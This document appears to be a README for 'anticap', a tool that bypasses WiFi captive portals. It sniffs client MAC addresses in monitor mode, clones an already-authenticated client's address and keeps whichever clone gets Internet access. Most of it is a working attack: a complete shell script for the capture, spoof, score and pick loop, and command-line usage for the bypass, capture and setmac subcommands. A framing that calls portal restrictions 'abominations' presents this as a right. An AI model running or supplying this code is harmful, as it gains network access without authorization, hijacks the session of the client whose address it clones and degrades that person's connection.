Bypass captive portals and get free WiFi easy 😝
Today people have forgotten that Internet access is a basic human right. Admins who "just do their job" place captive portals with ads, phone number verification, and other abominations on otherwise open WiFi networks. This tool is made to overcome that inconvenience.
This tool puts the wireless interface into 802.11 monitor mode and passively captures frames (packets) from every device operating within range of the target access point (WiFi router). The 802.11 header of each captured frame carries the transmitting client's MAC address in the clear; the header is not encrypted even on WPA networks. Captive portals typically key their session state and access-control decisions on the client's MAC address, so cloning the MAC of an already-authenticated client inherits that client's authorization and bypasses the portal without ever interacting with it.
Note that using a spoofed MAC address while the legitimate client is still active causes an address conflict: the access point tracks one station per MAC address, so frames addressed to that MAC are received and acknowledged by both radios, and the uplink traffic of both devices is mixed into a single session. This degrades network performance for both parties, since the access point cannot tell which physical device a frame belongs to (the device closer to the WiFi router, with the stronger signal, will have a much better time).
The general workflow consists of several steps:

1. Capture packets in monitor mode for a given WiFi network to discover connected devices. All captured MACs are stored as JSON text files in the store directory for later access.
   Note that anticap also maintains a cache of discovered networks in store/networks/{bssid}.json. This cache maps BSSIDs to their SSIDs and channels.
2. Spoof your MAC to every discovered address and try to ping an external server to find out whether Internet access is available. N pings are sent for each address to determine a rating score: the more successful pings, the higher the score.
3. If a tested MAC address has Internet connectivity, set it as your interface's current MAC.
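The same capture, spoof, score and pick procedure as one plain-shell script. This is an added example, not anticap's own code: it drives the radio with iw and ip, captures with tcpdump, scores each cloned MAC with ping and keeps the best one. The interface name wlan0, the ping target 1.1.1.1 and the "SA:" field layout of tcpdump -e output are assumptions, and the PING_CMD override exists only so the scoring logic can be exercised without a radio.

```shell
#!/bin/sh
# Added example, not part of anticap: the capture -> spoof -> score -> pick
# loop on top of iproute2, iw, tcpdump and ping.
# Assumptions (placeholders, not from the project): interface wlan0, ping
# target 1.1.1.1, and tcpdump's -e rendering of 802.11 headers as
# "BSSID:xx:.. SA:xx:.. DA:xx:.." fields. The radio steps need root.
set -u

IFACE="${IFACE:-wlan0}"
PING_CMD="${PING_CMD:-ping}"            # overridable so scoring can be tested offline
PING_TARGET="${PING_TARGET:-1.1.1.1}"
ORIG_MAC="$(cat "/sys/class/net/$IFACE/address" 2>/dev/null || echo '')"

# Text processing only: pull source addresses (SA:) out of tcpdump -e lines,
# drop the AP itself and every group address (the I/G bit is the lowest bit of
# the first octet, i.e. an odd second hex digit), and print each client once.
extract_client_macs() {
    local bssid="$1"
    grep -io 'SA:[0-9a-f:]\{17\}' \
        | cut -d: -f2- \
        | grep -vix "$bssid" \
        | awk -F: 'tolower($1) ~ /^[0-9a-f][02468ace]$/ { print tolower($0) }' \
        | sort -u
}

# Step 1: monitor mode on the target channel, capture N frames that involve
# the BSSID and reduce them to candidate client MACs.
capture_clients() {
    local bssid="$1" channel="$2" count="${3:-200}"
    ip link set "$IFACE" down
    iw dev "$IFACE" set type monitor
    ip link set "$IFACE" up
    iw dev "$IFACE" set channel "$channel"
    tcpdump -i "$IFACE" -e -nn -c "$count" \
        "wlan addr1 $bssid or wlan addr2 $bssid or wlan addr3 $bssid" 2>/dev/null \
        | extract_client_macs "$bssid"
}

# Step 2: back to managed mode with the cloned address. Re-associating with the
# SSID afterwards is left to the supplicant (NetworkManager / wpa_supplicant).
spoof_mac() {
    ip link set "$IFACE" down
    iw dev "$IFACE" set type managed
    ip link set "$IFACE" address "$1"
    ip link set "$IFACE" up
}

reset_mac() { [ -n "$ORIG_MAC" ] && spoof_mac "$ORIG_MAC"; }

# Step 3: score = number of successful pings out of N (one packet per attempt,
# one-second timeout, so a dead session costs at most N seconds).
score_mac() {
    local n="$1" ok=0 i=0
    while [ "$i" -lt "$n" ]; do
        "$PING_CMD" -c 1 -W 1 "$PING_TARGET" >/dev/null 2>&1 && ok=$((ok + 1))
        i=$((i + 1))
    done
    echo "$ok"
}

# Step 4: read "mac score" lines, print the best MAC that got at least one
# reply; print nothing and return 1 if no candidate has Internet access.
best_candidate() {
    local best
    best="$(sort -k2,2nr -k1,1 | awk '$2 > 0 { print $1; exit }')"
    [ -n "$best" ] && echo "$best"
}

# Whole procedure: capture, try every client MAC, keep the best, else restore.
bypass() {
    local bssid="$1" channel="$2" n="${3:-5}" results="" mac best
    for mac in $(capture_clients "$bssid" "$channel"); do
        spoof_mac "$mac"
        sleep 5                          # give the supplicant time to re-associate
        results="$results$mac $(score_mac "$n")
"
    done
    best="$(printf '%s' "$results" | best_candidate)" || {
        echo "no authenticated client MAC found, restoring $ORIG_MAC" >&2
        reset_mac
        return 1
    }
    spoof_mac "$best"
    echo "using $best"
}

# Usage: sudo sh bypass.sh bypass <BSSID> <channel> [pings]
if [ "${1:-}" = "bypass" ]; then bypass "$2" "$3" "${4:-5}"; fi
```

Scoring on ping success count alone is deliberately crude: a captive portal that answers ICMP but blocks TCP would still score well, so swap the probe for an HTTP fetch of a known page if the network behaves that way.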
./build.sh
anticap uses a subcommand-based interface. Use the -h flag with any subcommand to get more help on its available options.
Full process: packet capture, MAC spoof, and connection testing
sudo ./build/anticap bypass -t <BSSID> [-ch <channel>] [-s <SSID>] [-i <interface>] [-n <num_packets>] [-v]
- -t: Target BSSID
- -ch: Target channel
- -s: Manually specify SSID
- -i: Interface name
- -n: Number of packets to capture
- -v: Verbose output
Scan available WiFi networks and populate cache
sudo ./build/anticap scan [-5g] [-t <milliseconds>] [-s] [-i <interface>] [-v]
- -5g: Include 5GHz channels
- -t: Scan time per channel in milliseconds
- -s: Save discovered networks to cache
- -i: Interface name
- -v: Verbose output
Run packet capture only (no MAC spoofing)
sudo ./build/anticap capture -t <BSSID> [-ch <channel>] [-i <interface>] [-n <num_packets>] [-v]
Join a specified WiFi network
sudo ./build/anticap join <SSID> [-p <password>] [-v]
Reset interface to original MAC address
sudo ./build/anticap reset [-i <interface>] [-v]
Set interface MAC address
sudo ./build/anticap setmac <MAC_ADDRESS> [-i <interface>] [-v]
List stored captures for a target BSSID (works without root)
./build/anticap list -t <BSSID> [-v]
